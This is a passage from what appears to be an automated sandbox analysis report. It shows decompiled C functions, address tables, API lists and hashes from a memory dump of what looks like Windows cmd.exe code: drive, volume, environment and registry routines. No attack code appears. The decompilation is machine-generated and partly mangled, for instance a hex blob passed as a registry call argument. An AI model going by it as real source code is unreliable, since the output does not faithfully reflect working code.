                                0x4a55c807
                                0x4a55c80a
                                0x4a55c80a
                                0x4a55c80a
                                0x4a55c80e
                                0x4a55c80f
                                0x4a55c816
                                0x4a55c818
                                0x4a55c81b
                                0x4a55c821
                                0x4a55c82e
                                0x4a55c84b
                                0x4a55c83d
                                0x4a55c840
                                0x4a55c840
                                0x00000000
                                0x4a55c82e
                                0x4a55c6e8
                                0x4a55c6ea
                                0x4a55c6f0
                                0x4a55c6f2
                                0x4a55c6f9
                                0x4a55c728
                                0x4a55c72a
                                0x4a55c735
                                0x00000000
                                0x00000000
                                0x4a55c737
                                0x4a55c737
                                0x4a55c737
                                0x4a55c742
                                0x4a55c5c6
                                0x4a55c5c9
                                0x4a55c5cd
                                0x4a55ca80
                                0x4a55ca94
                                0x4a55ca99
                                0x4a55ca9c
                                0x4a55ca9e
                                0x4a55ca9e
                                0x4a55caa1
                                0x4a55caa1
                                0x4a55caa1
                                0x4a55caa5
                                0x4a55caa9
                                0x00000000
                                0x00000000
                                0x4a55caaf
                                0x4a55caaf
                                0x4a55c773
                                0x4a55c773
                                0x00000000
                                0x4a55c773
                                0x4a55c5d3
                                0x4a55c5d3
                                0x00000000
                                0x4a55c857
                                0x4a55c862
                                0x00000000
                                0x00000000
                                0x4a55c86c
                                0x4a55c877
                                0x00000000
                                0x00000000
                                0x4a55c5da
                                0x4a55c5eb
                                0x4a55c5f0
                                0x4a55c5f3
                                0x4a55c5f5
                                0x4a55c5f5
                                0x4a55c5f8
                                0x4a55c5f8
                                0x4a55c5f8
                                0x4a55c5fc
                                0x4a55c5fd
                                0x00000000
                                0x00000000
                                0x4a55c881
                                0x4a55c887
                                0x4a55c88c
                                0x4a55c89a
                                0x4a55c8b2
                                0x4a55c8b8
                                0x4a55c8ba
                                0x4a55c8ba
                                0x4a55c8bd
                                0x4a55c8bd
                                0x4a55c8bd
                                0x4a55c8c0
                                0x4a55c8c1
                                0x4a55c8c5
                                0x00000000
                                0x00000000
                                0x4a55c8cb
                                0x4a55c8cb
                                0x00000000
                                0x00000000
                                0x4a55c8cd
                                0x4a55c8d5
                                0x4a55c8de
                                0x4a55c8d7
                                0x4a55c8d7
                                0x4a55c8d7
                                0x4a55c8e3
                                0x4a55c8e3
                                0x4a55c8e9
                                0x4a55c8ea
                                0x4a55c8ef
                                0x4a55c8f1
                                0x4a55c8f1
                                0x4a55c8f4
                                0x4a55c8f4
                                0x4a55c8f4
                                0x4a55c8f7
                                0x4a55c8f8
                                0x4a55c8f9
                                0x00000000
                                0x00000000
                                0x4a55c905
                                0x4a55c911
                                0x4a55c916
                                0x4a55c918
                                0x4a55c918
                                0x4a55c91b
                                0x4a55c91b
                                0x4a55c91b
                                0x4a55c91e
                                0x4a55c91f
                                0x4a55c923
                                0x00000000
                                0x00000000
                                0x4a55c929
                                0x4a55c929
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c92b
                                0x4a55c932
                                0x00000000
                                0x00000000
                                0x4a55c938
                                0x4a55c938
                                0x4a55c939
                                0x4a55c939
                                0x4a55c93b
                                0x00000000
                                0x4a55c95e
                                0x4a55c93f
                                0x4a55c93f
                                0x4a55c941
                                0x4a55c944
                                0x00000000
                                0x00000000
                                0x4a55c94a
                                0x4a55c94a
                                0x4a55c94c
                                0x4a55c94d
                                0x4a55c950
                                0x4a55c951
                                0x4a55c952
                                0x4a55c958
                                0x4a55c958
                                0x00000000
                                0x00000000
                                0x4a55c96d
                                0x4a55c974
                                0x00000000
                                0x00000000
                                0x4a55c97a
                                0x4a55c97a
                                0x00000000
                                0x00000000
                                0x4a55c5d3
                                0x4a55c748
                                0x4a55c748
                                0x4a55c75c
                                0x4a55c761
                                0x4a55c764
                                0x4a55c766
                                0x4a55c766
                                0x4a55c769
                                0x4a55c769
                                0x4a55c769
                                0x4a55c76d
                                0x4a55c76e
                                0x00000000
                                0x4a55c769
                                0x4a55c6fb
                                0x4a55c6fb
                                0x00000000
                                0x4a55c700
                                0x4a55c716
                                0x4a55c71c
                                0x4a55c71c
                                0x4a55c726
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c726
                                0x00000000
                                0x4a55c700
                                0x4a55c7b4
                                0x4a55c7b6
                                0x4a55c7be
                                0x4a55c7ca
                                0x4a55cae0
                                0x4a55cae0
                                0x4a55c7d5
                                0x4a55c7d5
                                0x4a55ca17
                                0x4a55ca21
                                0x00000000
                                0x00000000
                                0x4a55ca27
                                0x4a55ca27
                                0x4a55ca2c
                                0x4a55ca32
                                0x4a55ca33
                                0x4a55ca38
                                0x4a55ca3b
                                0x4a55ca3d
                                0x4a55ca40
                                0x4a55ca40
                                0x4a55ca40
                                0x4a55ca43
                                0x4a55ca44
                                0x4a55ca48
                                0x00000000
                                0x00000000
                                0x4a55ca4e
                                0x4a55ca4e
                                0x00000000
                                0x4a55ca40

                                APIs
                                • towupper.MSVCRT ref: 4A55C70A
                                  • Part of subcall function 4A55179D: _vsnwprintf.MSVCRT ref: 4A5517CB
                                • GetDriveTypeW.KERNEL32(?), ref: 4A55C99F
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: DriveType_vsnwprintftowupper
                                • String ID: %s $Unknown
                                • API String ID: 1061416136-2164786120
                                • Opcode ID: 681e95b09777bdd0b4e6dd9c99fdc6d8ae094ea80b4e16ec17530b44dfd4d302
                                • Instruction ID: 5306c10d5a6cf22533f3d289e9967a5ee2850493b2fb44ff804875c76e19896c
                                • Opcode Fuzzy Hash: 681e95b09777bdd0b4e6dd9c99fdc6d8ae094ea80b4e16ec17530b44dfd4d302
                                • Instruction Fuzzy Hash: 8C41AF79811115DADB11EFA4CA48AEA7BF8FF09300F01419BE54AFB558E7308B84CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56D40E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 62%
                                			E4A56D40E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				intOrPtr* _t22;
				intOrPtr _t30;
				long _t33;
				signed int _t35;
				void* _t36;
				signed int _t37;
				void* _t45;

				_t36 = __ecx;
				_push(0x18);
				_push(0x4a56d518);
				E4A55264A(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t45 - 0x28)) = 0;
				 *((intOrPtr*)(_t45 - 0x24)) = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, "effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0", _t45 - 0x1c);
				 *(_t45 - 0x20) = _t19;
				if(_t19 == 0) {
					_t22 = E4A5522CA( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + 0x3c)), 0x4a56bd20, 3);
					_t43 = _t22;
					 *((intOrPtr*)(_t45 - 4)) = 0;
					if( *_t22 != 0) {
						_t35 = E4A5519D6(E4A552598(_t36, _t43));
						 *((intOrPtr*)(_t45 - 0x28)) = _t35;
						__eflags = _t35;
						if(_t35 != 0) {
							_t37 =  *(E4A55413B(_t43)) & 0x0000ffff;
							__eflags = _t37;
							if(_t37 != 0) {
								__eflags = _t37 - 0x3d;
								if(_t37 == 0x3d) {
									_t44 = E4A55413B(_t27);
									_t30 = E4A5519D6(E4A552598(_t37, _t28));
									 *((intOrPtr*)(_t45 - 0x24)) = _t30;
									__eflags = _t30;
									if(_t30 != 0) {
										__eflags =  *((intOrPtr*)(E4A55413B(_t44)));
										if(__eflags != 0) {
											goto L8;
										} else {
											_t33 = E4A56D26F(_t35, 0, _t44, __eflags,  *(_t45 - 0x1c), _t35,  *((intOrPtr*)(_t45 - 0x24)));
											goto L12;
										}
									}
								} else {
									L8:
									_push(0);
									_push(0x232a);
									E4A556D44(_t37);
								}
							} else {
								_push(_t35);
								goto L3;
							}
						}
					} else {
						_push(0);
						L3:
						_push( *(_t45 - 0x1c));
						_t33 = E4A56D0F9();
						L12:
						 *(_t45 - 0x20) = _t33;
					}
					 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
					E4A56D503();
					RegCloseKey( *(_t45 - 0x1c));
					_t19 =  *(_t45 - 0x20);
				}
				return E4A5513B6(_t19);
			}











                                0x4a56d40e
                                0x4a56d40e
                                0x4a56d410
                                0x4a56d415
                                0x4a56d41c
                                0x4a56d41f
                                0x4a56d436
                                0x4a56d43c
                                0x4a56d441
                                0x4a56d454
                                0x4a56d459
                                0x4a56d45b
                                0x4a56d461
                                0x4a56d47a
                                0x4a56d47c
                                0x4a56d47f
                                0x4a56d481
                                0x4a56d489
                                0x4a56d48c
                                0x4a56d48f
                                0x4a56d494
                                0x4a56d498
                                0x4a56d4af
                                0x4a56d4b8
                                0x4a56d4bd
                                0x4a56d4c0
                                0x4a56d4c2
                                0x4a56d4ca
                                0x4a56d4cd
                                0x00000000
                                0x4a56d4cf
                                0x4a56d4d6
                                0x00000000
                                0x4a56d4d6
                                0x4a56d4cd
                                0x4a56d49a
                                0x4a56d49a
                                0x4a56d49a
                                0x4a56d49b
                                0x4a56d4a0
                                0x4a56d4a6
                                0x4a56d491
                                0x4a56d491
                                0x00000000
                                0x4a56d491
                                0x4a56d48f
                                0x4a56d463
                                0x4a56d463
                                0x4a56d464
                                0x4a56d464
                                0x4a56d467
                                0x4a56d4db
                                0x4a56d4db
                                0x4a56d4db
                                0x4a56d4de
                                0x4a56d4e5
                                0x4a56d4ed
                                0x4a56d4f3
                                0x4a56d4f3
                                0x4a56d4fb

                                APIs
                                • RegOpenKeyExW.KERNEL32 ref: 4A56D436
                                  • Part of subcall function 4A5522CA: iswspace.MSVCRT ref: 4A55238B
                                • RegCloseKey.KERNEL32(?), ref: 4A56D4ED
                                Strings
                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A56D426
                                • Software\Classes, xrefs: 4A56D42C
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpeniswspace
                                • String ID: Software\Classes$effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 1054702887-3510350853
                                • Opcode ID: 7908335f4384bbae726f50ae1ecb75e89b03292f8ea65325d2dd38913b5c7a97
                                • Instruction ID: 3153a1c349e0ce8a7644d97053ec407f5f57e908f78f70b39b4cddb39d6f92e3
                                • Opcode Fuzzy Hash: 7908335f4384bbae726f50ae1ecb75e89b03292f8ea65325d2dd38913b5c7a97
                                • Instruction Fuzzy Hash: E8210772C41B19BADB12AFA0DF54E9EBEB9FF98251F114816E108BF159E6B80D40C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56DDAB, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E4A56DDAB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				intOrPtr* _t22;
				intOrPtr _t29;
				long _t32;
				intOrPtr* _t34;
				void* _t35;
				signed int _t36;
				void* _t44;

				_t35 = __ecx;
				_push(0x18);
				_push(0x4a56deb0);
				E4A55264A(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t44 - 0x28)) = 0;
				 *((intOrPtr*)(_t44 - 0x24)) = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, "effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0", _t44 - 0x1c);
				 *(_t44 - 0x20) = _t19;
				if(_t19 == 0) {
					_t22 = E4A5522CA( *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + 0x3c)), 0x4a56bd20, 3);
					_t42 = _t22;
					 *((intOrPtr*)(_t44 - 4)) = 0;
					if( *_t22 != 0) {
						_t34 = E4A5519D6(E4A552598(_t35, _t42));
						 *((intOrPtr*)(_t44 - 0x28)) = _t34;
						if(_t34 != 0) {
							_t36 =  *(E4A55413B(_t42)) & 0x0000ffff;
							if(_t36 != 0) {
								if(_t36 == 0x3d) {
									_t43 = E4A55413B(_t27);
									_t29 = E4A5519D6(_t28);
									 *((intOrPtr*)(_t44 - 0x24)) = _t29;
									if(_t29 != 0) {
										if( *((intOrPtr*)(E4A55413B(_t43))) != 0) {
											goto L8;
										} else {
											_t32 = E4A56DB5E( *(_t44 - 0x1c), _t34,  *((intOrPtr*)(_t44 - 0x24)));
											goto L12;
										}
									}
								} else {
									L8:
									_push(0);
									_push(0x232a);
									E4A556D44(_t36);
								}
							} else {
								_push(_t34);
								goto L3;
							}
						}
					} else {
						_push(0);
						L3:
						_push( *(_t44 - 0x1c));
						_t32 = E4A56D88B();
						L12:
						 *(_t44 - 0x20) = _t32;
					}
					 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
					E4A56DE9A();
					RegCloseKey( *(_t44 - 0x1c));
					_t19 =  *(_t44 - 0x20);
				}
				return E4A5513B6(_t19);
			}











                                0x4a56ddab
                                0x4a56ddab
                                0x4a56ddad
                                0x4a56ddb2
                                0x4a56ddb9
                                0x4a56ddbc
                                0x4a56ddd3
                                0x4a56ddd9
                                0x4a56ddde
                                0x4a56ddf1
                                0x4a56ddf6
                                0x4a56ddf8
                                0x4a56ddfe
                                0x4a56de17
                                0x4a56de19
                                0x4a56de1e
                                0x4a56de26
                                0x4a56de2c
                                0x4a56de35
                                0x4a56de4c
                                0x4a56de4f
                                0x4a56de54
                                0x4a56de59
                                0x4a56de64
                                0x00000000
                                0x4a56de66
                                0x4a56de6d
                                0x00000000
                                0x4a56de6d
                                0x4a56de64
                                0x4a56de37
                                0x4a56de37
                                0x4a56de37
                                0x4a56de38
                                0x4a56de3d
                                0x4a56de43
                                0x4a56de2e
                                0x4a56de2e
                                0x00000000
                                0x4a56de2e
                                0x4a56de2c
                                0x4a56de00
                                0x4a56de00
                                0x4a56de01
                                0x4a56de01
                                0x4a56de04
                                0x4a56de72
                                0x4a56de72
                                0x4a56de72
                                0x4a56de75
                                0x4a56de7c
                                0x4a56de84
                                0x4a56de8a
                                0x4a56de8a
                                0x4a56de92

                                APIs
                                • RegOpenKeyExW.KERNEL32 ref: 4A56DDD3
                                  • Part of subcall function 4A5522CA: iswspace.MSVCRT ref: 4A55238B
                                • RegCloseKey.KERNEL32(?), ref: 4A56DE84
                                Strings
                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A56DDC3
                                • Software\Classes, xrefs: 4A56DDC9
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpeniswspace
                                • String ID: Software\Classes$effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 1054702887-3510350853
                                • Opcode ID: 213d05ad560b5f1f1feea19db6e052b0d8f4344207932bd56709fff020c12612
                                • Instruction ID: 897d4657bc09d7c780819956e5946c2a67da08c370386a5f0d18b8a2cb05cec1
                                • Opcode Fuzzy Hash: 213d05ad560b5f1f1feea19db6e052b0d8f4344207932bd56709fff020c12612
                                • Instruction Fuzzy Hash: 4021CFB2C41A1ABADB52AFA0DF44DAF7AB9FFA8350F110816E108BE059E7700D40C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5559D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 4A552D9B: iswspace.MSVCRT ref: 4A552DAD
                                • iswspace.MSVCRT ref: 4A5559FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: iswspace
                                • String ID: off
                                • API String ID: 2389812497-733764931
                                • Opcode ID: 32a4f983f432b47ddde7604aae850e8ec554804dfb8c9fafef91188d1138b314
                                • Instruction ID: 3359b837b15ce66d437d004a50cbff2b68c78cd583602032a4b91805bf3f3677
                                • Opcode Fuzzy Hash: 32a4f983f432b47ddde7604aae850e8ec554804dfb8c9fafef91188d1138b314
                                • Instruction Fuzzy Hash: 5F119C32510211B6E3215A50CF86B462B58DF8D272F534C23F94AFA08CE660C9C0C2E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55A1FA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                Download Yara Rule
                                C-Code - Quality: 77%
                                			E4A55A1FA(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v532;
				char _v1056;
				short _v1580;
				long _v1584;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				long _t29;
				WCHAR* _t30;
				void* _t31;
				void* _t37;
				signed int _t40;

				_t31 = __ebx;
				_t14 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t14 ^ _t40;
				 *0x4a574128 = 0;
				if(E4A55A2C1(_t37, _a4, _a8,  &_v1056, 0x106) == 0) {
					L3:
					_t18 = 0;
					L4:
					return E4A5513A9(_t18, _t31, _v8 ^ _t40, _t37, 0, 0x106);
				}
				E4A55185A( &_v532, 0x106,  &_v1056);
				E4A5520A9(0x106,  &_v532, 0x106, E4A552EC8);
				if(GetVolumeInformationW( &_v532, 0, 0, 0,  &_v1584, 0,  &_v1580, 0x106) == 0) {
					_t29 = GetLastError();
					 *0x4a574128 = _t29;
					if(_t29 == 0x90) {
						 *0x4a574128 = 0;
					}
					goto L3;
				}
				_t30 =  &_v1580;
				__imp___wcsicmp(_t30, "FAT");
				if(_t30 == 0) {
					if(_v1584 != 0xc) {
						goto L3;
					}
					_t18 = 1;
					goto L4;
				}
				goto L3;
			}

















                                0x4a55a1fa
                                0x4a55a205
                                0x4a55a20c
                                0x4a55a227
                                0x4a55a234
                                0x4a55a2a0
                                0x4a55a2a0
                                0x4a55a2a2
                                0x4a55a2af
                                0x4a55a2af
                                0x4a55a245
                                0x4a55a257
                                0x4a55a27e
                                0x4a56aa10
                                0x4a56aa16
                                0x4a56aa20
                                0x4a56aa26
                                0x4a56aa26
                                0x00000000
                                0x4a56aa20
                                0x4a55a284
                                0x4a55a290
                                0x4a55a29a
                                0x4a56aa03
                                0x00000000
                                0x00000000
                                0x4a56aa09
                                0x00000000
                                0x4a56aa09
                                0x00000000

                                APIs
                                  • Part of subcall function 4A55A2C1: towupper.MSVCRT ref: 4A55A346
                                • GetVolumeInformationW.KERNEL32 ref: 4A55A276
                                • _wcsicmp.MSVCRT ref: 4A55A290
                                • GetLastError.KERNEL32 ref: 4A56AA10
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorInformationLastVolume_wcsicmptowupper
                                • String ID: FAT
                                • API String ID: 206573626-238207945
                                • Opcode ID: 68224d435f210fd3e2d28732a8c901185a258c29796185042a9d93bfb858eb2a
                                • Instruction ID: a217d81c32defb0e2f8972ff13e2a31c06d122d8f15cf76e915b694d5952201a
                                • Opcode Fuzzy Hash: 68224d435f210fd3e2d28732a8c901185a258c29796185042a9d93bfb858eb2a
                                • Instruction Fuzzy Hash: DC2162B2902118AFDB20EA65DE48DDA7BBCEB9A310F41009BF605E651CD6719A84CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56C936, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                Download Yara Rule
                                C-Code - Quality: 95%
                                			E4A56C936(intOrPtr* _a4) {
				intOrPtr* _t7;
				signed int _t9;
				void* _t12;
				intOrPtr* _t13;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t25;
				intOrPtr* _t26;
				signed int _t28;

				_t26 = _a4;
				if(_t26 != 0) {
					_t7 = _t26;
					_t25 = _t7 + 2;
					do {
						_t21 =  *_t7;
						_t7 = _t7 + 2;
					} while (_t21 != 0);
					while(1) {
						_t9 = _t7 - _t25;
						_t28 = _t9 >> 1;
						if(_t9 == 0) {
							break;
						}
						if( *0x4a5741b4 != 0) {
							_t12 = 1;
							L12:
							return _t12;
						}
						if( *_t26 != 0x3d) {
							E4A5558F3(L"%s\r\n", _t26);
						}
						_t26 = _t26 + 2 + _t28 * 2;
						_t13 = _t26;
						_t25 = _t13 + 2;
						do {
							_t22 =  *_t13;
							_t13 = _t13 + 2;
						} while (_t22 != 0);
					}
					_t12 = 0;
					goto L12;
				}
				_push("Null environment");
				fprintf(__imp___iob + 0x40, "\nCMD Internal Error %s\n");
				return 1;
			}












                                0x4a56c93c
                                0x4a56c941
                                0x4a56c964
                                0x4a56c966
                                0x4a56c969
                                0x4a56c969
                                0x4a56c96d
                                0x4a56c96e
                                0x4a56c9a5
                                0x4a56c9a5
                                0x4a56c9a9
                                0x4a56c9ab
                                0x00000000
                                0x00000000
                                0x4a56c97d
                                0x4a56c9b7
                                0x4a56c9af
                                0x00000000
                                0x4a56c9af
                                0x4a56c983
                                0x4a56c98b
                                0x4a56c991
                                0x4a56c992
                                0x4a56c996
                                0x4a56c998
                                0x4a56c99b
                                0x4a56c99b
                                0x4a56c99f
                                0x4a56c9a0
                                0x4a56c99b
                                0x4a56c9ad
                                0x00000000
                                0x4a56c9ad
                                0x4a56c948
                                0x4a56c956
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: fprintf
                                • String ID: CMD Internal Error %s$%s$Null environment
                                • API String ID: 383729395-2781220306
                                • Opcode ID: b885396eac7d72c007a4cdb7fa766496e2c6d841f2902a665588a800f4185272
                                • Instruction ID: 70a6e4d5af8c78836d6ad8fdaf2664abfa44e672f182159a89a6e74c663fcb7b
                                • Opcode Fuzzy Hash: b885396eac7d72c007a4cdb7fa766496e2c6d841f2902a665588a800f4185272
                                • Instruction Fuzzy Hash: 4E017BF7141102BBD3106758CB04A937BF8EFCA3A4B1A8422E55AEF254EA70F501C7D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A561CA5, Relevance: 6.4, APIs: 4, Instructions: 357COMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E4A561CA5(signed int __ecx, intOrPtr* __edx, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				short _v528;
				WCHAR* _v532;
				signed int _v536;
				void* _v540;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				intOrPtr _t99;
				WCHAR* _t101;
				WCHAR* _t105;
				WCHAR* _t106;
				signed int _t109;
				signed int _t115;
				void* _t118;
				void* _t122;
				void* _t125;
				void* _t129;
				WCHAR* _t133;
				signed int _t136;
				void _t140;
				intOrPtr* _t145;
				void* _t152;
				intOrPtr* _t155;
				intOrPtr* _t159;
				void _t164;
				signed int _t167;
				void* _t179;
				short* _t180;
				WCHAR* _t185;
				void* _t188;
				short* _t190;
				void* _t191;
				short _t193;
				intOrPtr* _t194;
				void _t201;
				void _t202;
				short _t203;
				void* _t204;
				void* _t210;
				void* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t219;
				short _t221;
				short _t222;
				short* _t223;
				void* _t224;
				short* _t225;
				void* _t226;
				intOrPtr _t227;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				signed int _t238;

				_t220 = __edx;
				_t189 = __ecx;
				_t97 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t97 ^ _t238;
				_t99 = _a8;
				_v536 = _v536 & 0x00000000;
				_t185 = _a12;
				_t232 = _a4;
				_t229 =  *(_t99 + 0x20);
				_v548 = _t99;
				_v532 = _t185;
				_v540 = _t229;
				if(_t229 == 0) {
					E4A55185A(_t185, _a16, 0x4a575260);
					_t101 = _t185;
					_t190 =  &(_t101[1]);
					do {
						_t221 =  *_t101;
						_t101 =  &(_t101[1]);
					} while (_t221 != 0);
					_t222 =  *0x4a590664; // 0x5c
					_t105 =  &(_t185[_t101 - _t190 >> 1]);
					_t191 = _t185;
					if(_t185 >= _t105) {
						L24:
						 *_t105 = _t222;
						_t105[1] = 0;
						L25:
						if(( *(_t232 + 0x1c) & 0x00000200) == 0) {
							L38:
							_t106 = _t185;
							_t223 =  &(_t106[1]);
							do {
								_t193 =  *_t106;
								_t106 =  &(_t106[1]);
							} while (_t193 != 0);
							_t220 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
							_t194 = _t220;
							_t109 = _t106 - _t223 >> 1;
							_t232 = _t194 + 2;
							do {
								_t229 =  *_t194;
								_t194 = _t194 + 2;
							} while (_t229 != 0);
							if((_t194 - _t232 >> 1) + _t109 + 1 > 0x104) {
								goto L74;
							}
							_push(_t220);
							goto L44;
						} else {
							_t229 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
							_t125 = _t229;
							_t224 = _t125 + 2;
							do {
								_t201 =  *_t125;
								_t125 = _t125 + 2;
							} while (_t201 != 0);
							if(_t125 == _t224) {
								goto L38;
							}
							_t129 = _t229;
							_t220 = _t129 + 2;
							do {
								_t202 =  *_t129;
								_t129 = _t129 + 2;
							} while (_t202 != 0);
							if(_t129 == _t220) {
								L74:
								_v536 = 1;
								L6:
								if(_a20 == 0) {
									L10:
									return E4A5513A9(_v536, _t185, _v8 ^ _t238, _t220, _t229, _t232);
								}
								_t200 = _v540;
								if(_t200 == 0 || ( *(_t200 + 0x1c) & 0x00002000) == 0) {
									_t200 = _v548;
									if(( *(_v548 + 0x1c) & 0x00002000) != 0) {
										goto L75;
									}
								} else {
									L75:
									_t229 = CreateFileW(_t185, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t229 != 0xffffffff) {
										_t115 = GetFileType(_t229);
										asm("sbb esi, esi");
										_t232 =  ~((_t115 & 0xffff7fff) - 1) + 1;
										CloseHandle(_t229);
										if( ~((_t115 & 0xffff7fff) - 1) + 1 != 0) {
											_t118 = E4A56FE1B(_t185, _t200, _t220, _t229, _t185, 0x400023d3, 0x400023d4);
											if(_t118 == 0) {
												 *_t185 = 0;
											} else {
												if(_t118 == 0) {
													_t122 = _v540;
													if(_t122 == 0) {
														_t122 = _v548;
													}
													 *(_t122 + 0x1c) =  *(_t122 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L10;
							}
							_t133 = _t185;
							_t225 =  &(_t133[1]);
							do {
								_t203 =  *_t133;
								_t133 =  &(_t133[1]);
							} while (_t203 != 0);
							_t204 = _t229;
							_t136 = _t133 - _t225 >> 1;
							_t220 = _t204 + 2;
							do {
								_t232 =  *_t204;
								_t204 = _t204 + 2;
							} while (_t232 != 0);
							if((_t204 - _t220 >> 1) + _t136 + 1 > 0x104) {
								goto L74;
							}
							_push(_t229);
							L44:
							_push(_a16);
							_push(_t185);
							E4A5520A9(_t232);
							goto L6;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						if( *_t191 == _t222) {
							_t229 = _t191;
						}
						_t191 = _t191 + 2;
					} while (_t191 < _t105);
					if(_t229 == 0 || _t229 < _t105 - 2) {
						goto L24;
					} else {
						goto L25;
					}
				}
				if( *((short*)(E4A552ED1( *_t229))) == 0x3a) {
					if(( *(_t232 + 0x1c) & 0x00000200) == 0) {
						L59:
						_t186 =  *_v540;
						_t140 =  *_v540;
						_t226 = _t140 + 2;
						do {
							_t210 =  *_t140;
							_t140 = _t140 + 2;
						} while (_t210 != 0);
						_t229 = _t140 - _t226 >> 1;
						_t145 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
						_t211 = _t145 + 2;
						do {
							_t220 =  *_t145;
							_t145 = _t145 + 2;
						} while (_t220 != 0);
						if((_t145 - _t211 >> 1) + _t229 + 1 > 0x104) {
							L58:
							_t185 = _v532;
							goto L74;
						}
						E4A55185A(_v532, _a16, _t186);
						_t152 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
						L65:
						E4A5520A9(_t232, _v532, _a16, _t152);
						_t185 = _v532;
						goto L6;
					}
					_t212 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
